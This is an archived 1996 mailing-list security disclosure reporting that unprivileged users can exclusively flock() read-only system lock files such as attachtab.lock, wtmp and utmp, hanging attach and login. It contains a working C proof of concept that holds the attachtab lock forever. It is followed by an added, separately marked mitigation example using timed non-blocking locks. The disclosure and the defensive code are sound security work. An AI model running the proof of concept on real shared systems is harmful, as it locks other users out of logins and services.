[1402] in NetBSD-Development


[security] file locking denial of service attack

daemon@ATHENA.MIT.EDU (Erik Nygren)
Thu Nov 28 14:48:38 1996

To: linux-dev@MIT.EDU, netbsd-dev@MIT.EDU, pc-dialup@MIT.EDU, security@MIT.EDU
Date: Thu, 28 Nov 1996 14:48:13 EST
From: Erik Nygren <nygren@MIT.EDU>


[Wasn't sure of the best place to send this.]

You don't need write privileges to exclusively lock a file with flock.
As a result, locking key system files that other programs like to lock
(such as attachtab.lock, wtmp, utmp, and others) can create a denial
of service attack.  The login shipped with linux-athena is vulnerable
(although it may not need to lock wtmp in the way it does).  Attach on
Linux and NetBSD can be forced to hang (which essentially prohibits
logins of Athena users) if /var/tmp/attachtab.lock is set.  This may
be more of a problem on dialups than on cluster or private machines.

For example, when the following program is run, all attaches will hang
for all users:

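	#include <fcntl.h>	/* open(), O_RDONLY */
	#include <stdio.h>
	#include <sys/file.h>	/* flock(), LOCK_EX */
	#include <unistd.h>	/* sleep() */

	int main(int argc, char **argv)
	{
	        int fd;

	        /* Read-only access is enough to take the exclusive lock. */
	        fd = open("/var/tmp/attachtab.lock", O_RDONLY);
	        if (fd < 0) {
	                perror("open");
	                return 1;
	        }
	        flock(fd, LOCK_EX);
	        /* Hold the lock for as long as the process lives. */
	        while (1) sleep(20);
	}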

This may be a previously known problem.  I'm not sure
what the best way of fixing it is, either.  Regardless,
I'm sure there are a number of other critical programs you could
hose using this.  Blah.

	Erik
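
On the question of a fix raised in the message above, one mitigation for a program that must take such a lock is to bound the wait, so a lock held by someone else produces an error instead of a hang. This is an added example, not part of the original message and not code from attach or login; `flock_timed`, `demo` and the scratch file are hypothetical names constructed for illustration.

```c
#define _DEFAULT_SOURCE          /* expose flock() and mkstemp() on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/file.h>
#include <time.h>
#include <unistd.h>

/* Hypothetical helper: take an exclusive flock() on fd, polling for at most
 * timeout_ms. Returns 0 on success, -1 with errno set (ETIMEDOUT when
 * another open file description held the lock for the whole wait). */
int flock_timed(int fd, int timeout_ms)
{
    const struct timespec step = { 0, 50L * 1000 * 1000 };  /* 50 ms */
    int waited = 0;

    for (;;) {
        if (flock(fd, LOCK_EX | LOCK_NB) == 0)
            return 0;
        if (errno != EWOULDBLOCK && errno != EINTR)
            return -1;                    /* real failure, e.g. EBADF */
        if (waited >= timeout_ms) {
            errno = ETIMEDOUT;
            return -1;
        }
        nanosleep(&step, NULL);
        waited += 50;
    }
}

/* Constructed demo on a scratch file: "holder" plays the read-only locker
 * from the post, "client" a program that needs the same lock. Returns 0
 * when the client times out while the lock is held and succeeds after. */
int demo(void)
{
    char path[] = "/tmp/flock_demo_XXXXXX";   /* constructed scratch file */
    int tmp = mkstemp(path);
    int holder = open(path, O_RDONLY), client = open(path, O_RDONLY);
    int ok;

    if (tmp < 0 || holder < 0 || client < 0) return -1;
    flock(holder, LOCK_EX);               /* lock taken with read access only */
    ok = flock_timed(client, 200) == -1 && errno == ETIMEDOUT;
    flock(holder, LOCK_UN);
    ok = ok && flock_timed(client, 200) == 0;
    close(tmp); close(holder); close(client); unlink(path);
    return ok ? 0 : 1;
}

int main(void) { return demo(); }
```

A bounded wait turns the hang into a reportable failure; it does not restore service while the lock stays held, so the caller still has to decide whether to proceed without the lock or refuse.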
